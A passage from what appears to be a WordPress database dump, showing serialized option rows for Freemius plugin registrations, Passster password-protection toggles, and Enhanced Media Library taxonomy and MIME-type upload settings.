Calendar\";s:4:\"slug\";s:19:\"the-events-calendar\";s:12:\"premium_slug\";s:27:\"the-events-calendar-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:43:\"the-events-calendar/the-events-calendar.php\";s:7:\"version\";s:5:\"5.2.1\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_e32061abc28cfedf231f3e5c4e626\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3069\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:9:\"basepress\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:9:\"BasePress\";s:4:\"slug\";s:9:\"basepress\";s:12:\"premium_slug\";s:17:\"basepress-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:23:\"basepress/basepress.php\";s:7:\"version\";s:6:\"2.15.4\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_4f447df1ddff73b6182b7022a1e7d\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"1252\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:9:\"unique_id\";s:32:\"b4b0281ad2e9bedd6f6de3aaa7cbdbe2\";s:13:\"admin_notices\";a:3:{s:17:\"content-protector\";a:0:{}s:19:\"the-events-calendar\";a:0:{}s:9:\"basepress\";a:0:{}}}','yes'),(39073,'passster_addons','a:4:{s:41:\"passster_addons_multiple_passwords_toggle\";s:3:\"off\";s:32:\"passster_addons_recaptcha_toggle\";s:3:\"off\";s:28:\"passster_addons_users_toggle\";s:3:\"off\";s:27:\"passster_addons_link_toggle\";s:3:\"off\";}','yes'),(39074,'fs_api_cache','a:0:{}','yes'),(39075,'fs_gdpr','a:1:{s:2:\"u2\";a:1:{s:8:\"required\";b:0;}}','yes'),(39078,'passster_shortcode','a:2:{s:34:\"passster_shortcode_protection_type\";s:8:\"password\";s:27:\"passster_shortcode_password\";s:4:\"time\";}','yes'),(39277,'passster_admin_captcha_notice_shown','on','yes'),(39308,'wpuxss_eml_taxonomies','a:7:{s:14:\"media_category\";a:12:{s:8:\"assigned\";i:1;s:9:\"eml_media\";i:1;s:6:\"labels\";a:12:{s:4:\"name\";s:16:\"Media Categories\";s:13:\"singular_name\";s:14:\"Media Category\";s:9:\"menu_name\";s:16:\"Media Categories\";s:9:\"all_items\";s:20:\"All Media Categories\";s:9:\"edit_item\";s:19:\"Edit Media Category\";s:9:\"view_item\";s:19:\"View Media Category\";s:11:\"update_item\";s:21:\"Update Media Category\";s:12:\"add_new_item\";s:22:\"Add New Media Category\";s:13:\"new_item_name\";s:23:\"New Media Category Name\";s:11:\"parent_item\";s:21:\"Parent Media Category\";s:17:\"parent_item_colon\";s:22:\"Parent Media Category:\";s:12:\"search_items\";s:23:\"Search Media Categories\";}s:12:\"hierarchical\";i:1;s:17:\"show_admin_column\";i:1;s:12:\"admin_filter\";i:1;s:21:\"media_uploader_filter\";i:1;s:25:\"media_popup_taxonomy_edit\";i:0;s:17:\"show_in_nav_menus\";i:1;s:4:\"sort\";i:0;s:12:\"show_in_rest\";i:0;s:7:\"rewrite\";a:2:{s:4:\"slug\";s:14:\"media_category\";s:10:\"with_front\";i:1;}}s:8:\"category\";a:6:{s:8:\"assigned\";i:0;s:9:\"eml_media\";i:0;s:12:\"admin_filter\";i:1;s:21:\"media_uploader_filter\";i:1;s:25:\"media_popup_taxonomy_edit\";i:0;s:20:\"taxonomy_auto_assign\";i:0;}s:8:\"post_tag\";a:6:{s:8:\"assigned\";i:0;s:9:\"eml_media\";i:0;s:12:\"admin_filter\";i:1;s:21:\"media_uploader_filter\";i:1;s:25:\"media_popup_taxonomy_edit\";i:0;s:20:\"taxonomy_auto_assign\";i:0;}s:16:\"wpforms_log_type\";a:6:{s:8:\"assigned\";i:0;s:9:\"eml_media\";i:0;s:12:\"admin_filter\";i:1;s:21:\"media_uploader_filter\";i:1;s:25:\"media_popup_taxonomy_edit\";i:0;s:20:\"taxonomy_auto_assign\";i:0;}s:13:\"bg_block_type\";a:6:{s:8:\"assigned\";i:0;s:9:\"eml_media\";i:0;s:12:\"admin_filter\";i:1;s:21:\"media_uploader_filter\";i:1;s:25:\"media_popup_taxonomy_edit\";i:0;s:20:\"taxonomy_auto_assign\";i:0;}s:16:\"tribe_events_cat\";a:6:{s:8:\"assigned\";i:0;s:9:\"eml_media\";i:0;s:12:\"admin_filter\";i:1;s:21:\"media_uploader_filter\";i:1;s:25:\"media_popup_taxonomy_edit\";i:0;s:20:\"taxonomy_auto_assign\";i:0;}s:19:\"mediamatic_wpfolder\";a:6:{s:9:\"eml_media\";i:0;s:12:\"admin_filter\";i:1;s:21:\"media_uploader_filter\";i:1;s:25:\"media_popup_taxonomy_edit\";i:0;s:20:\"taxonomy_auto_assign\";i:0;s:8:\"assigned\";i:1;}}','yes'),(39309,'wpuxss_eml_lib_options','a:11:{s:24:\"enhance_media_shortcodes\";i:0;s:13:\"media_orderby\";s:4:\"date\";s:11:\"media_order\";s:4:\"DESC\";s:12:\"natural_sort\";i:0;s:13:\"force_filters\";i:1;s:15:\"filters_to_show\";a:3:{i:0;s:5:\"types\";i:1;s:5:\"dates\";i:2;s:10:\"taxonomies\";}s:10:\"show_count\";i:1;s:16:\"include_children\";i:1;s:17:\"grid_show_caption\";i:0;s:17:\"grid_caption_type\";s:5:\"title\";s:9:\"search_in\";a:3:{i:0;s:6:\"titles\";i:1;s:8:\"captions\";i:2;s:12:\"descriptions\";}}','yes'),(39310,'wpuxss_eml_tax_options','a:3:{s:12:\"tax_archives\";i:0;s:24:\"edit_all_as_hierarchical\";i:0;s:21:\"bulk_edit_save_button\";i:0;}','yes'),(39311,'wpuxss_eml_mimes','a:92:{s:12:\"jpg|jpeg|jpe\";a:5:{s:4:\"mime\";s:10:\"image/jpeg\";s:8:\"singular\";s:10:\"image/jpeg\";s:6:\"plural\";s:10:\"image/jpeg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"gif\";a:5:{s:4:\"mime\";s:9:\"image/gif\";s:8:\"singular\";s:9:\"image/gif\";s:6:\"plural\";s:9:\"image/gif\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"png\";a:5:{s:4:\"mime\";s:9:\"image/png\";s:8:\"singular\";s:9:\"image/png\";s:6:\"plural\";s:9:\"image/png\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"bmp\";a:5:{s:4:\"mime\";s:9:\"image/bmp\";s:8:\"singular\";s:9:\"image/bmp\";s:6:\"plural\";s:9:\"image/bmp\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"tiff|tif\";a:5:{s:4:\"mime\";s:10:\"image/tiff\";s:8:\"singular\";s:10:\"image/tiff\";s:6:\"plural\";s:10:\"image/tiff\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"ico\";a:5:{s:4:\"mime\";s:12:\"image/x-icon\";s:8:\"singular\";s:12:\"image/x-icon\";s:6:\"plural\";s:12:\"image/x-icon\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"asf|asx\";a:5:{s:4:\"mime\";s:14:\"video/x-ms-asf\";s:8:\"singular\";s:14:\"video/x-ms-asf\";s:6:\"plural\";s:14:\"video/x-ms-asf\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wmv\";a:5:{s:4:\"mime\";s:14:\"video/x-ms-wmv\";s:8:\"singular\";s:14:\"video/x-ms-wmv\";s:6:\"plural\";s:14:\"video/x-ms-wmv\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wmx\";a:5:{s:4:\"mime\";s:14:\"video/x-ms-wmx\";s:8:\"singular\";s:14:\"video/x-ms-wmx\";s:6:\"plural\";s:14:\"video/x-ms-wmx\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:2:\"wm\";a:5:{s:4:\"mime\";s:13:\"video/x-ms-wm\";s:8:\"singular\";s:13:\"video/x-ms-wm\";s:6:\"plural\";s:13:\"video/x-ms-wm\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"avi\";a:5:{s:4:\"mime\";s:9:\"video/avi\";s:8:\"singular\";s:9:\"video/avi\";s:6:\"plural\";s:9:\"video/avi\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"divx\";a:5:{s:4:\"mime\";s:10:\"video/divx\";s:8:\"singular\";s:10:\"video/divx\";s:6:\"plural\";s:10:\"video/divx\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"flv\";a:5:{s:4:\"mime\";s:11:\"video/x-flv\";s:8:\"singular\";s:11:\"video/x-flv\";s:6:\"plural\";s:11:\"video/x-flv\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:6:\"mov|qt\";a:5:{s:4:\"mime\";s:15:\"video/quicktime\";s:8:\"singular\";s:15:\"video/quicktime\";s:6:\"plural\";s:15:\"video/quicktime\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:12:\"mpeg|mpg|mpe\";a:5:{s:4:\"mime\";s:10:\"video/mpeg\";s:8:\"singular\";s:10:\"video/mpeg\";s:6:\"plural\";s:10:\"video/mpeg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"mp4|m4v\";a:5:{s:4:\"mime\";s:9:\"video/mp4\";s:8:\"singular\";s:9:\"video/mp4\";s:6:\"plural\";s:9:\"video/mp4\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"ogv\";a:5:{s:4:\"mime\";s:9:\"video/ogg\";s:8:\"singular\";s:9:\"video/ogg\";s:6:\"plural\";s:9:\"video/ogg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"webm\";a:5:{s:4:\"mime\";s:10:\"video/webm\";s:8:\"singular\";s:10:\"video/webm\";s:6:\"plural\";s:10:\"video/webm\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"mkv\";a:5:{s:4:\"mime\";s:16:\"video/x-matroska\";s:8:\"singular\";s:16:\"video/x-matroska\";s:6:\"plural\";s:16:\"video/x-matroska\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"3gp|3gpp\";a:5:{s:4:\"mime\";s:10:\"video/3gpp\";s:8:\"singular\";s:10:\"video/3gpp\";s:6:\"plural\";s:10:\"video/3gpp\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"3g2|3gp2\";a:5:{s:4:\"mime\";s:11:\"video/3gpp2\";s:8:\"singular\";s:11:\"video/3gpp2\";s:6:\"plural\";s:11:\"video/3gpp2\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:18:\"txt|asc|c|cc|h|srt\";a:5:{s:4:\"mime\";s:10:\"text/plain\";s:8:\"singular\";s:10:\"text/plain\";s:6:\"plural\";s:10:\"text/plain\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"csv\";a:5:{s:4:\"mime\";s:8:\"text/csv\";s:8:\"singular\";s:8:\"text/csv\";s:6:\"plural\";s:8:\"text/csv\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"tsv\";a:5:{s:4:\"mime\";s:25:\"text/tab-separated-values\";s:8:\"singular\";s:25:\"text/tab-separated-values\";s:6:\"plural\";s:25:\"text/tab-separated-values\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"ics\";a:5:{s:4:\"mime\";s:13:\"text/calendar\";s:8:\"singular\";s:13:\"text/calendar\";s:6:\"plural\";s:13:\"text/calendar\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"rtx\";a:5:{s:4:\"mime\";s:13:\"text/richtext\";s:8:\"singular\";s:13:\"text/richtext\";s:6:\"plural\";s:13:\"text/richtext\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"css\";a:5:{s:4:\"mime\";s:8:\"text/css\";s:8:\"singular\";s:8:\"text/css\";s:6:\"plural\";s:8:\"text/css\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"htm|html\";a:5:{s:4:\"mime\";s:9:\"text/html\";s:8:\"singular\";s:9:\"text/html\";s:6:\"plural\";s:9:\"text/html\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"vtt\";a:5:{s:4:\"mime\";s:8:\"text/vtt\";s:8:\"singular\";s:8:\"text/vtt\";s:6:\"plural\";s:8:\"text/vtt\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"dfxp\";a:5:{s:4:\"mime\";s:20:\"application/ttaf+xml\";s:8:\"singular\";s:20:\"application/ttaf+xml\";s:6:\"plural\";s:20:\"application/ttaf+xml\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:11:\"mp3|m4a|m4b\";a:5:{s:4:\"mime\";s:10:\"audio/mpeg\";s:8:\"singular\";s:10:\"audio/mpeg\";s:6:\"plural\";s:10:\"audio/mpeg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"aac\";a:5:{s:4:\"mime\";s:9:\"audio/aac\";s:8:\"singular\";s:9:\"audio/aac\";s:6:\"plural\";s:9:\"audio/aac\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:6:\"ra|ram\";a:5:{s:4:\"mime\";s:17:\"audio/x-realaudio\";s:8:\"singular\";s:17:\"audio/x-realaudio\";s:6:\"plural\";s:17:\"audio/x-realaudio\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wav\";a:5:{s:4:\"mime\";s:9:\"audio/wav\";s:8:\"singular\";s:9:\"audio/wav\";s:6:\"plural\";s:9:\"audio/wav\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"ogg|oga\";a:5:{s:4:\"mime\";s:9:\"audio/ogg\";s:8:\"singular\";s:9:\"audio/ogg\";s:6:\"plural\";s:9:\"audio/ogg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"flac\";a:5:{s:4:\"mime\";s:10:\"audio/flac\";s:8:\"singular\";s:10:\"audio/flac\";s:6:\"plural\";s:10:\"audio/flac\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"mid|midi\";a:5:{s:4:\"mime\";s:10:\"audio/midi\";s:8:\"singular\";s:10:\"audio/midi\";s:6:\"plural\";s:10:\"audio/midi\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wma\";a:5:{s:4:\"mime\";s:14:\"audio/x-ms-wma\";s:8:\"singular\";s:14:\"audio/x-ms-wma\";s:6:\"plural\";s:14:\"audio/x-ms-wma\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wax\";a:5:{s:4:\"mime\";s:14:\"audio/x-ms-wax\";s:8:\"singular\";s:14:\"audio/x-ms-wax\";s:6:\"plural\";s:14:\"audio/x-ms-wax\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"mka\";a:5:{s:4:\"mime\";s:16:\"audio/x-matroska\";s:8:\"singular\";s:16:\"audio/x-matroska\";s:6:\"plural\";s:16:\"audio/x-matroska\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"rtf\";a:5:{s:4:\"mime\";s:15:\"application/rtf\";s:8:\"singular\";s:15:\"application/rtf\";s:6:\"plural\";s:15:\"application/rtf\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:2:\"js\";a:5:{s:4:\"mime\";s:22:\"application/javascript\";s:8:\"singular\";s:22:\"application/javascript\";s:6:\"plural\";s:22:\"application/javascript\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"pdf\";a:5:{s:4:\"mime\";s:15:\"application/pdf\";s:8:\"singular\";s:3:\"PDF\";s:6:\"plural\";s:4:\"PDFs\";s:6:\"filter\";i:1;s:6:\"upload\";i:1;}s:3:\"swf\";a:5:{s:4:\"mime\";s:29:\"application/x-shockwave-flash\";s:8:\"singular\";s:29:\"application/x-shockwave-flash\";s:6:\"plural\";s:29:\"application/x-shockwave-flash\";s:6:\"filter\";i:0;s:6:\"upload\";i:0;}s:5:\"class\";a:5:{s:4:\"mime\";s:16:\"application/java\";s:8:\"singular\";s:16:\"application/java\";s:6:\"plural\";s:16:\"application/java\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"tar\";a:5:{s:4:\"mime\";s:17:\"application/x-tar\";s:8:\"singular\";s:17:\"application/x-tar\";s:6:\"plural\";s:17:\"application/x-tar\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"zip\";a:5:{s:4:\"mime\";s:15:\"application/zip\";s:8:\"singular\";s:15:\"application/zip\";s:6:\"plural\";s:15:\"application/zip\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"gz|gzip\";a:5:{s:4:\"mime\";s:18:\"application/x-gzip\";s:8:\"singular\";s:18:\"application/x-gzip\";s:6:\"plural\";s:18:\"application/x-gzip\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"rar\";a:5:{s:4:\"mime\";s:15:\"application/rar\";s:8:\"singular\";s:15:\"application/rar\";s:6:\"plural\";s:15:\"application/rar\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:2:\"7z\";a:5:{s:4:\"mime\";s:27:\"application/x-7z-compressed\";s:8:\"singular\";s:27:\"application/x-7z-compressed\";s:6:\"plural\";s:27:\"application/x-7z-compressed\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"exe\";a:5:{s:4:\"mime\";s:24:\"application/x-msdownload\";s:8:\"singular\";s:24:\"application/x-msdownload\";s:6:\"plural\";s:24:\"application/x-msdownload\";s:6:\"filter\";i:0;s:6:\"upload\";i:0;}s:3:\"psd\";a:5:{s:4:\"mime\";s:24:\"application/octet-stream\";s:8:\"singular\";s:24:\"application/octet-stream\";s:6:\"plural\";s:24:\"application/octet-stream\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"xcf\";a:5:{s:4:\"mime\";s:24:\"application/octet-stream\";s:8:\"singular\";s:24:\"application/octet-stream\";s:6:\"plural\";s:24:\"application/octet-stream\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"doc\";a:5:{s:4:\"mime\";s:18:\"application/msword\";s:8:\"singular\";s:18:\"application/msword\";s:6:\"plural\";s:18:\"application/msword\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:11:\"pot|pps|ppt\";a:5:{s:4:\"mime\";s:29:\"application/vnd.ms-powerpoint\";s:8:\"singular\";s:29:\"application/vnd.ms-powerpoint\";s:6:\"plural\";s:29:\"application/vnd.ms-powerpoint\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wri\";a:5:{s:4:\"mime\";s:24:\"application/vnd.ms-write\";s:8:\"singular\";s:24:\"application/vnd.ms-write\";s:6:\"plural\";s:24:\"application/vnd.ms-write\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:15:\"xla|xls|xlt|xlw\";a:5:{s:4:\"mime\";s:24:\"application/vnd.ms-excel\";s:8:\"singular\";s:24:\"application/vnd.ms-excel\";s:6:\"plural\";s:24:\"application/vnd.ms-excel\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"mdb\";a:5:{s:4:\"mime\";s:25:\"application/vnd.ms-access\";s:8:\"singular\";s:25:\"application/vnd.ms-access\";s:6:\"plural\";s:25:\"application/vnd.ms-access\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"mpp\";a:5:{s:4:\"mime\";s:26:\"application/vnd.ms-project\";s:8:\"singular\";s:26:\"application/vnd.ms-project\";s:6:\"plural\";s:26:\"application/vnd.ms-project\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"docx\";a:5:{s:4:\"mime\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\";s:8:\"singular\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\";s:6:\"plural\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"docm\";a:5:{s:4:\"mime\";s:48:\"application/vnd.ms-word.document.macroEnabled.12\";s:8:\"singular\";s:48:\"application/vnd.ms-word.document.macroEnabled.12\";s:6:\"plural\";s:48:\"application/vnd.ms-word.document.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"dotx\";a:5:{s:4:\"mime\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.template\";s:8:\"singular\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.template\";s:6:\"plural\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.template\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"dotm\";a:5:{s:4:\"mime\";s:48:\"application/vnd.ms-word.template.macroEnabled.12\";s:8:\"singular\";s:48:\"application/vnd.ms-word.template.macroEnabled.12\";s:6:\"plural\";s:48:\"application/vnd.ms-word.template.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xlsx\";a:5:{s:4:\"mime\";s:65:\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\";s:8:\"singular\";s:65:\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\";s:6:\"plural\";s:65:\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xlsm\";a:5:{s:4:\"mime\";s:46:\"application/vnd.ms-excel.sheet.macroEnabled.12\";s:8:\"singular\";s:46:\"application/vnd.ms-excel.sheet.macroEnabled.12\";s:6:\"plural\";s:46:\"application/vnd.ms-excel.sheet.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xlsb\";a:5:{s:4:\"mime\";s:53:\"application/vnd.ms-excel.sheet.binary.macroEnabled.12\";s:8:\"singular\";s:53:\"application/vnd.ms-excel.sheet.binary.macroEnabled.12\";s:6:\"plural\";s:53:\"application/vnd.ms-excel.sheet.binary.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xltx\";a:5:{s:4:\"mime\";s:68:\"application/vnd.openxmlformats-officedocument.spreadsheetml.template\";s:8:\"singular\";s:68:\"application/vnd.openxmlformats-officedocument.spreadsheetml.template\";s:6:\"plural\";s:68:\"application/vnd.openxmlformats-officedocument.spreadsheetml.template\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xltm\";a:5:{s:4:\"mime\";s:49:\"application/vnd.ms-excel.template.macroEnabled.12\";s:8:\"singular\";s:49:\"application/vnd.ms-excel.template.macroEnabled.12\";s:6:\"plural\";s:49:\"application/vnd.ms-excel.template.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xlam\";a:5:{s:4:\"mime\";s:46:\"application/vnd.ms-excel.addin.macroEnabled.12\";s:8:\"singular\";s:46:\"application/vnd.ms-excel.addin.macroEnabled.12\";s:6:\"plural\";s:46:\"application/vnd.ms-excel.addin.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"pptx\";a:5:{s:4:\"mime\";s:73:\"application/vnd.openxmlformats-officedocument.presentationml.presentation\";s:8:\"singular\";s:73:\"application/vnd.openxmlformats-officedocument.presentationml.presentation\";s:6:\"plural\";s:73:\"application/vnd.openxmlformats-officedocument.presentationml.presentation\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"pptm\";a:5:{s:4:\"mime\";s:58:\"application/vnd.ms-powerpoint.presentation.macroEnabled.12\";s:8:\"singular\";s:58:\"application/vnd.ms-powerpoint.presentation.macroEnabled.12\";s:6:\"plural\";s:58:\"application/vnd.ms-powerpoint.presentation.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"ppsx\";a:5:{s:4:\"mime\";s:70:\"application/vnd.openxmlformats-officedocument.presentationml.slideshow\";s:8:\"singular\";s:70:\"application/vnd.openxmlformats-officedocument.presentationml.slideshow\";s:6:\"plural\";s:70:\"application/vnd.openxmlformats-officedocument.presentationml.slideshow\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"ppsm\";a:5:{s:4:\"mime\";s:55:\"application/vnd.ms-powerpoint.slideshow.macroEnabled.12\";s:8:\"singular\";s:55:\"application/vnd.ms-powerpoint.slideshow.macroEnabled.12\";s:6:\"plural\";s:55:\"application/vnd.ms-powerpoint.slideshow.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"potx\";a:5:{s:4:\"mime\";s:69:\"application/vnd.openxmlformats-officedocument.presentationml.template\";s:8:\"singular\";s:69:\"application/vnd.openxmlformats-officedocument.presentationml.template\";s:6:\"plural\";s:69:\"application/vnd.openxmlformats-officedocument.presentationml.template\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"potm\";a:5:{s:4:\"mime\";s:54:\"application/vnd.ms-powerpoint.template.macroEnabled.12\";s:8:\"singular\";s:54:\"application/vnd.ms-powerpoint.template.macroEnabled.12\";s:6:\"plural\";s:54:\"application/vnd.ms-powerpoint.template.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"ppam\";a:5:{s:4:\"mime\";s:51:\"application/vnd.ms-powerpoint.addin.macroEnabled.12\";s:8:\"singular\";s:51:\"application/vnd.ms-powerpoint.addin.macroEnabled.12\";s:6:\"plural\";s:51:\"application/vnd.ms-powerpoint.addin.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"sldx\";a:5:{s:4:\"mime\";s:66:\"application/vnd.openxmlformats-officedocument.presentationml.slide\";s:8:\"singular\";s:66:\"application/vnd.openxmlformats-officedocument.presentationml.slide\";s:6:\"plural\";s:66:\"application/vnd.openxmlformats-officedocument.presentationml.slide\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"sldm\";a:5:{s:4:\"mime\";s:51:\"application/vnd.ms-powerpoint.slide.macroEnabled.12\";s:8:\"singular\";s:51:\"application/vnd.ms-powerpoint.slide.macroEnabled.12\";s:6:\"plural\";s:51:\"application/vnd.ms-powerpoint.slide.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:28:\"onetoc|onetoc2|onetmp|onepkg\";a:5:{s:4:\"mime\";s:19:\"application/onenote\";s:8:\"singular\";s:19:\"application/onenote\";s:6:\"plural\";s:19:\"application/onenote\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"oxps\";a:5:{s:4:\"mime\";s:16:\"application/oxps\";s:8:\"singular\";s:16:\"application/oxps\";s:6:\"plural\";s:16:\"application/oxps\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"xps\";a:5:{s:4:\"mime\";s:30:\"application/vnd.ms-xpsdocument\";s:8:\"singular\";s:30:\"application/vnd.ms-xpsdocument\";s:6:\"plural\";s:30:\"application/vnd.ms-xpsdocument\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odt\";a:5:{s:4:\"mime\";s:39:\"application/vnd.oasis.opendocument.text\";s:8:\"singular\";s:39:\"application/vnd.oasis.opendocument.text\";s:6:\"plural\";s:39:\"application/vnd.oasis.opendocument.text\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odp\";a:5:{s:4:\"mime\";s:47:\"application/vnd.oasis.opendocument.presentation\";s:8:\"singular\";s:47:\"application/vnd.oasis.opendocument.presentation\";s:6:\"plural\";s:47:\"application/vnd.oasis.opendocument.presentation\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"ods\";a:5:{s:4:\"mime\";s:46:\"application/vnd.oasis.opendocument.spreadsheet\";s:8:\"singular\";s:46:\"application/vnd.oasis.opendocument.spreadsheet\";s:6:\"plural\";s:46:\"application/vnd.oasis.opendocument.spreadsheet\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odg\";a:5:{s:4:\"mime\";s:43:\"application/vnd.oasis.opendocument.graphics\";s:8:\"singular\";s:43:\"application/vnd.oasis.opendocument.graphics\";s:6:\"plural\";s:43:\"application/vnd.oasis.opendocument.graphics\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odc\";a:5:{s:4:\"mime\";s:40:\"application/vnd.oasis.opendocument.chart\";s:8:\"singular\";s:40:\"application/vnd.oasis.opendocument.chart\";s:6:\"plural\";s:40:\"application/vnd.oasis.opendocument.chart\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odb\";a:5:{s:4:\"mime\";s:43:\"application/vnd.oasis.opendocument.database\";s:8:\"singular\";s:43:\"application/vnd.oasis.opendocument.database\";s:6:\"plural\";s:43:\"application/vnd.oasis.opendocument.database\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odf\";a:5:{s:4:\"mime\";s:42:\"application/vnd.oasis.ope